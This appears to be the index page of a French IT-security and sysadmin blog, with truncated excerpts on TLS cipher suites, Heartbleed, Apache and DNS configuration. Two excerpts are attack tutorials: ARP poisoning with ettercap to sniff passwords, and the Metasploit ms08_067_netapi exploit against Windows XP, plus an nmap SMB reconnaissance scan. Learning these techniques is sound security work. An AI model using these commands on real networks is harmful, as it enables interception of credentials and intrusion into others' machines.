Quelques blogs sur la sécurité informatique

http://nakedsecurity.sophos.com/ http://threatpost.com/ http://krebsonsecurity.com/ https://www.schneier.com/ http://taosecurity.blogspot.com/ http://securityweekly.com/ http://blog.uncommonsensesecurity.com/ https://securosis.com/blog http://www.mckeay.net/ http://www.securitybloggersnetwork.com/security-bloggers-network-the-feed/

Les suites cryptographiques

Une suite cryptographique (cipher suite) est une combinaison d’algorithmes permettant l’authentification, le chiffrement et l’intégrité des données ainsi que l’échange de la clé afin d’établir un paramétrage de sécurité pour une connexion réseau utilisant le protocole de communication Transport Layer Security (TLS). Elle est représentée généralement comme ceci : TLS_[Kx_]Au_WITH_En_Mac (exemples : TLS_RSA_WITH_RC4_128_MD5 et TLS_DHE_RSA_WITH_AES_128_CBC_SHA) […]

Vulnérabilités SSL/TLS

Voici quelques vulnérabilités concernant SSL/TLS : article à compléter! Avril 2014 : HEARTBLEED Versions vulnérables : Les versions d’OpenSSL de 1.0.1 à 1.0.1f Impacts : Accès à la mémoire et extraction possible d’information sensible (notamment la clé privée du serveur). La vulnérabilité vient plus précisément de l’implémentation de TLS et DTLS, qui ne gère pas […]

Configurer le chiffrement TLS d’Apache sous Debian

Avec les récentes failles (POODLE, FREAK..) et les recommandations de l’ANSSI, il est important de n’autoriser, dans la mesure du possible, uniquement que TLSv1.1 et TLSv1.2. Voici un document très intéressant présentant un état des lieux des récommandations : http://www.ssi.gouv.fr/uploads/IMG/pdf/SSL_TLS_etat_des_lieux_et_recommandations.pdf Comment configurer (au mieux?) Apache pour Debian Squeeze LTS, Debian Wheezy et Debian Jessie? L’installation […]

Faire de l’ARP spoofing ou ARP poisoning

Il est très simple, sur le même segment réseau, de se faire passer pour la passerelle… On active l’IP forwarding : $ sudo sysctl -w net.ipv4.ip_forward=1 On lance ettercap : $ sudo ettercap -T -M arp /@IP_PASSERELLE/ /@IP_VICTIME/ Enfin on écoute le réseau avec un outil qui nous affichera les mots de passe transitant en […]

Attaquer un Windows XP avec Metasploit…

Lancement de metasploit : $ sudo msfconsole Utilisation de l’exploit « ms08_067_netapi » : msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > On affiche les options : msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE […]

Traquer Windows XP avec nmap…

… avec l’utilisation des scripts nmap smb-os-discovery.nse et smb-system-info.nse On lance nmap (ici depuis la distribution kali-linux) afin de scanner notre plage IP : root@kali# cd /usr/share/nmap root@kali:/usr/share/nmap# nmap -sV –script=scripts/smb-os-discovery.nse,scripts/smb-system-info.nse 192.168.0.0/24 Starting Nmap 6.25 ( http://nmap.org ) at 2014-11-21 10:04 CET … Nmap scan report for 192.168.0.53 Host is up (0.0011s latency). Not shown: […]

[Debian Wheezy] Spamassassin prend son temps! avec un DNSBL qui ne répond plus…

Après une installation classique d’un serveur SMTP (sur une Wheezy avec les paquets actuels) avec (donc) Postfix 2.9.6-2, Amavis-new 1:2.7.1-2, Clamav 0.97.8+dfsg-1 et Spamassassin 3.3.2 (+pyzor/razo2/DCC), je me rends compte que les messages mettent plus de 4 secondes avant d’être délivrés (de façon asynchrone tout de même).. En mode Debug on peut voir les pourcentages […]

Faire un routeur linux en quelques clics avec Ipcop

L’idée est de constituer un sous-réseau « indépendant » du réseau de l’entreprise (sans pour autant rajouter un nouveau vlan pour ça..) pour y faire des tests et notamment pour essayer Samba 4. Il me fallait une plage d’adresses « propre » d’aucune pollution – sans contrôleur de domaine (faire cohabiter plusieurs domaines « windows » c’est pas top) avec des […]

Configurer un serveur DNS sous debian avec bind9 avec enregistrement automatique par le DHCP

On considère que l’on a un Bind bien configuré (voir post précédent). On souhaite maintenant avoir aussi des zones maitres avec un enregistrement automatique des postes (window xp principalement!) dans le DNS ! Le DNS (la machine est « mondns » 192.168.1.3) n’est pas sur la même machine que le DHCP (la machine est « mondhcp » 192.168.1.4) Sur […]